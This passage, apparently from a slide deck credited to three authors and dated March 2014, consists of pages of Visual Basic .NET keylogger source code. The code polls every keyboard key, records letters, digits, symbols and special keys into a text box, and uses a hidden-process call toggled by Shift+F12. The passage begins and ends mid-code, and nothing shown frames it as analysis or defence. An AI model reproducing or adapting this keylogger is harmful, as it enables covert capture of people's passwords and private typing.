&H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "H" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "h" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.I)
  • 17. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "I" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "i" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.J) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "J" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "j" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.K) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "K" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "k" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.L) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "L" End If
  • 18. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "l" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.M) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "M" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "m" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.N) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "N" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "n" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.O) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "O" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then
  • 19. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 txtNishikieKeys.Text = txtNishikieKeys.Text & "o" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.P) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "P" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "p" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Q) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "Q" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "q" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.R) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "R" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "r" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.S)
  • 20. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "S" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "s" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.T) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "T" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "t" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.U) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "U" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "u" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.V) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "V" End If
  • 21. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "v" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.W) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "W" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "w" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.X) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "X" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "x" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Y) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "Y" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "y" End If
  • 22. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Z) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "Z" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "z" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D1) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "1" End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "!" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D2) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "2" End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "@" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D3)
  • 23. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "3" End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "#" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D4) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "4" End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "$" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D5) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "5" End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "%" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D6) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then
  • 24. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 txtNishikieKeys.Text = txtNishikieKeys.Text & "6" End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "^" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D7) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "7" End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "&" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D8) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "8" End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "*" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D9) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "9"
  • 25. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "(" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D0) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "0" End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & ")" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Back) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[backspace]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Tab) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[tab]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Return) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & vbCrLf End If
  • 26. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ShiftKey) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[shift]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ControlKey) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[ctrl]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Menu) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[alt]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Pause) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[pause]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Escape) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[esc]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Space) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & " " End If
  • 27. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.End) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[end]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Home) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[home]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Left) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[left]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Right) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[right]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Up) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[up]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Down) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[down]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Insert)
  • 28. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[insert]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Delete) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[Delete]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBAS) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & ";" End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & ":" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBBS) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "=" End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "+" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBCS) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "," End If
  • 29. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "<" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBDS) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "-" End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "_" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBES) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "." End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & ">" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBFS) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "/" End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "?" End If
  • 30. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HC0S) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "`" End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "~" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HDBS) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[" End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HDCS) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "" End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "|" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HDDS) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "]"
  • 31. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HDES) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "'" End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & Chr(34) End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Multiply) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "*" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Divide) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "/" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Add) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "+" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Subtract)
  • 32. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "-" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Decimal) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[Del]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F1) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[F1]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F2) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[F2]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F3) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[F3]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F4) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[F4]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F5) If (mimiNiCapsAmaLa And &H1S) = &H1S Then
  • 33. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 txtNishikieKeys.Text = txtNishikieKeys.Text & "[F5]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F6) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[F6]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F7) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[F7]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F8) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[F8]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F9) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[F9]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F10) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[F10]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F11) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[F11]"
  • 34. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F12) If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[F12]" End If If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then Me.Visible = True Call RegisterServiceProcess(0, 0) End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumLock) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[NumLock]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Scroll) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[ScrollLock]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Print) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[PrintScreen]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.PageUp) 